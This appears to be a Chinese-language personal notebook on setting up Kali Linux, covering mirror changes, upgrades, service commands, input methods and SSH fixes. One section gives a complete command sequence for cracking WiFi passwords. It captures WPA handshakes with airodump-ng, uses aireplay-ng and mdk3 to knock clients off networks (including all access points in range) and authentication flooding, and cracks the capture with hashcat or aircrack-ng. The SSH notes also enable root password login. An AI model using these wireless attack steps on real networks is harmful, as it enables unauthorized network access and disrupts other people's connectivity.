基础

系统安装

安装教程

安装后修改

• 替换阿里源

vim /etc/apt/sources.list
#阿里云kali源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

• 升级内核及软件

apt-get clean
apt-get update
apt-get upgrade -y
apt-get dist-upgrade -y
reboot //重启
apt-get install dkms kpartx printer-driver-postscript-hp
apt-get install -y linux-headers-$(uname -r) //不起作用(可选)

服务操作

# 查看状态
/etc/init.d/Name status
# 开启
/etc/init.d/ssh start
# 关闭
/etc/init.d/ssh stop
# 重启
/etc/init.d/ssh restart
# 设置服务自启动
update-rc.d ssh enable
# 关闭服务自启动
update-rc.d ssh disable

google拼音

apt-get install fcitx
apt-get install fcitx-googlepinyin
# 重启生效

目录转为英文

mv 桌面 Desktop
mv 文档 Documents
mv 图片 Pictures
mv 音乐 Music
mv 下载 Downloads
mv 视频 Video
mv 公共 Public
mv 模板 Template

破解wifi

• 参考网址
• 准备

# 字典，非常重要，kali自带
/usr/share/wordlists/rockyou.txt

• 安装hashcat-utils
• 转换cap为hccapx

# make
cd /usr/local
git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils/src
sudo make
# 加入环境变量
vim ~/.bashrc
# hashcat                                     
export PATH=$PATH:/usr/local/hashcat-utils/src
source ~/.bashrc
# 使用
cap2hccapx.bin XXX.cap XXX.hccapx

• 流程

# 查看支持监控模式的无线网卡
airmon-ng
# 开启无线网卡的监控模式
airmon-ng start wlan0
# 查看wifi网络
airodump-ng wlan0mon
# 抓取握手包
airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
# -c指定频道号
# –bssid指定路由器bssid
# -w指定抓取的数据包保存位置
# 强制连接到wifi的设备重新连接路由器
## 方式一：使用sdk3
# 让频道为 11 所有计算机都掉线：
sudo mdk3 wlan0mon d -c 11
## 方式二：指定设备
aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
# -0表示发起deauthentication攻击
# -a指定无线路由器BSSID
# -c指定强制断开的设备
# 强制查看该wifi名称：aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
# 如果成功
airmon-ng stop wlan0mon
# 使用GPU破解密码
# 转换格式
cap2hccapx.bin XXX.cap XXX.hccapx
# 开始破解
hashcat -m 2500 out.hccapx 字典文件
# 对于wep密码的破解，单只要抓取到足够的Beacons和Data数据就可以破解，理想情况下是100000+。
# 抓取握手包后加速收集，数据足够时crl+c停止即可
aireplay-ng -1 0 -a C8:3A:35:30:3E:C8 wlan0mon
aireplay-ng -3 -b C8:3A:35:30:3E:C8 wlan0mon
# 关闭网卡监控模式并开始破解
airmon-ng stop wlan0mon
aircrack-ng ~/*.cap

• mdk3

# 验证洪水攻击 /Authentication Flood Attack
# 指定路由器全部掉线，路由器有防DOS的功能的话，这个不好用
sudo mdk3 wlan0mon a -a D4:::9F::
# 取消身份验证攻击 / Deauth攻击
# 让频道为 11 所有计算机都掉线：
sudo mdk3 wlan0mon d -c 11
# 在本地创建一个白名单的文本文件whiltelist.txt，存放ID
sudo mdk3 wlan0mon d -c 11 -w "whitelist.txt"
# Deauthentication/Disassociation Amok Mode
# 可以将所有可见距离范围内AP的客户端均踢下线
mdk3 wlan0mon d -s 10000
# -w <filename>           #白名单mac地址列表文件
# -b <filename>           #黑名单mac地址列表文件
# -s <pps>                #速率，这个模式下默认无限制
# -c [chan,chan,chan,…]   #信道，可以多填，如 2,4,5,1

软件

其他问题

关机慢

Linux关机或重启时提示A stop job is running for ..

vim /etc/systemd/system.conf
# 修改：
DefaultTimeoutStartSec=10s
DefaultTimeoutStopSec=10s
# 刷新服务
systemctl daemon-reload

ssh无法登陆

• 被拒绝

/etc/init.d/ssh start
update-rc.d ssh enable

• 权限不够

vim /etc/ssh/sshd_config
# 取消以下注释
PasswordAuthentication yes
PermitRootLogin yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys

parallels下字体模糊

选中虚拟机->配置->硬件>视频 分辨率选择 最适合 Retina